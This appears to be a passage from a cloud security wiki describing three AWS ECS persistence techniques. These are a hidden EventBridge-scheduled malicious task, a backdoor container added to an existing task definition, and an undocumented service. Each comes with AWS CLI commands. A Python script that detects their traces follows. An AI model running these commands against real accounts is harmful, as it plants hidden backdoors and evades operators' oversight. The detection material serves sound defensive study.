An attacker can create a hidden scheduled ECS task using Amazon EventBridge so that a malicious task is executed on a recurring schedule. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[{"Id": "malicious-ecs-task-target","Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster","RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role","EcsParameters": {"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task","TaskCount": 1}}]'
```
Backdoor an Existing ECS Task Definition
TODO: Test
An attacker can add a stealthy backdoor container to an existing ECS task definition so that it runs alongside the legitimate container. The backdoor container can be used for persistence and to carry out malicious activity.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[{"name": "legitimate-container","image": "legitimate-image:latest","memory": 256,"cpu": 10,"essential": true},{"name": "backdoor-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": false}]'
```
Undocumented ECS Service
TODO: Test
An attacker can create an undocumented ECS service that runs a malicious task. By setting the desired task count to the minimum and disabling logging, the rogue service becomes harder for operators to discover.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
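As an added example (not part of the original page), the following offline triage script looks for the traces the three techniques above leave behind: containers pulled from outside a trusted registry or running without a log driver, EventBridge rules whose target launches an ECS task, and services that are not in the known inventory or run a task family with container findings. The sample inventory, the trusted registry and the known-service set are constructed assumptions; in practice the same checks run over the output of the `describe-task-definition`, `list-targets-by-rule` and `describe-services` calls.

```python
# Constructed sample inventory (not real account data), shaped like the output of
# describe-task-definition, list-targets-by-rule and describe-services after the three techniques.
TRUSTED_REGISTRY = "123456789012.dkr.ecr.us-east-1.amazonaws.com/"  # assumed image allowlist
KNOWN_SERVICES = {"web"}                                             # assumed service inventory
TASK_DEFINITIONS = [
    {"family": "existing-task", "containerDefinitions": [
        {"name": "legitimate-container", "image": TRUSTED_REGISTRY + "app:1.4",
         "essential": True, "logConfiguration": {"logDriver": "awslogs"}},
        {"name": "backdoor-container", "image": "malicious-image:latest", "essential": False}]},
    {"family": "malicious-task", "containerDefinitions": [
        {"name": "malicious-container", "image": "malicious-image:latest", "essential": True}]},
]
RULE_TARGETS = {"malicious-ecs-task-rule": [{"Id": "malicious-ecs-task-target",
    "Arn": "arn:aws:ecs:us-east-1:123456789012:cluster/your-cluster",
    "EcsParameters": {"TaskDefinitionArn":
        "arn:aws:ecs:us-east-1:123456789012:task-definition/malicious-task:1", "TaskCount": 1}}]}
SERVICES = [
    {"serviceName": "web", "desiredCount": 4,
     "taskDefinition": "arn:aws:ecs:us-east-1:123456789012:task-definition/existing-task:7"},
    {"serviceName": "undocumented-service", "desiredCount": 1,
     "taskDefinition": "arn:aws:ecs:us-east-1:123456789012:task-definition/malicious-task:1"},
]

def family_of(task_def_arn: str) -> str:
    # 'arn:...:task-definition/malicious-task:1' -> 'malicious-task'
    return task_def_arn.rsplit("/", 1)[1].split(":", 1)[0]

def check_containers(task_defs: list) -> dict:
    """Per family: containers with an untrusted image or :latest tag, no log driver, or non-essential."""
    findings: dict = {}
    for td in task_defs:
        for c in td["containerDefinitions"]:
            reasons = []
            if not c["image"].startswith(TRUSTED_REGISTRY) or c["image"].endswith(":latest"):
                reasons.append("image outside trusted registry or mutable tag")
            if "logConfiguration" not in c:
                reasons.append("no log driver configured")
            if not c.get("essential", True):
                reasons.append("non-essential sidecar")
            if reasons:
                findings.setdefault(td["family"], []).append((c["name"], reasons))
    return findings

def ecs_scheduled_families(rule_targets: dict) -> list:
    """Every EventBridge rule that launches an ECS task, paired with the task family it runs."""
    return [(rule, family_of(t["EcsParameters"]["TaskDefinitionArn"]))
            for rule, targets in rule_targets.items() for t in targets if "EcsParameters" in t]

def services_to_review(services: list, findings: dict) -> list:
    """Services missing from the inventory or running a family that has container findings."""
    return [s["serviceName"] for s in services
            if s["serviceName"] not in KNOWN_SERVICES or family_of(s["taskDefinition"]) in findings]
```

Note that the legitimate `web` service is reported as well, because the task family it runs now carries the backdoor container; that is the signal the second technique is designed to hide.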